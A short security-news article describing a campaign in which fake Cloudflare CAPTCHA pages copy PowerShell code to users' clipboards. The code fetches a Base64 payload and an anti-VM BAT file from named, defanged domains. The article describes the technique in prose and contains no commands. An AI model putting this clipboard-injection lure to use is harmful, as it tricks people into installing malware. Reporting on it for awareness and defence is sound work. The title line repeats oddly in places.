malware distribution via fake Cloudflare screens.

A new social engineering campaign is targeting unsuspecting users with fraudulent Cloudflare verification screens, marking a sophisticated evolution in malware distribution tactics.

This attack method takes advantage of the trusted appearance of legitimate web security services to trick victims into executing malicious code. The campaign begins with a convincing fake CAPTCHA verification page that mimics Cloudflare’s authentic security checks.

malware distribution via fake Cloudflare screens.malware distribution via fake Cloudflare screens.

When users encounter this deceptive interface, they are prompted to complete what seems like a routine verification process, unknowingly initiating a complex malware installation sequence. Security researchers, including analyst Shaquib Izhar, have flagged this campaign as particularly dangerous due to its advanced evasion techniques.

Upon clicking the “Verify” button, the malicious webpage injects PowerShell code into the user’s clipboard and captures their IP address for reconnaissance. Victims are then prompted to perform an additional verification step, creating a false sense of legitimacy while keystroke tracking monitors their actions.

malware distribution via fake Cloudflare screens.malware distribution via fake Cloudflare screens.

The attack employs a sophisticated infection mechanism designed to evade detection. It establishes communication with the attacker’s command and control infrastructure through embedded webhooks, sending real-time notifications about the victim’s actions.

The PowerShell command retrieves a Base64-encoded payload from pastesio[.]com and downloads a hardcoded BAT file from axiomsniper[.]info. This BAT file includes anti-analysis features, terminating execution if it detects a virtual machine environment, thus avoiding automated security analysis.

Currently, the BAT file has zero detection across VirusTotal scanners, underscoring the campaign’s effectiveness in evading traditional detection methods and highlighting the need for behavioral analysis in modern cybersecurity defenses.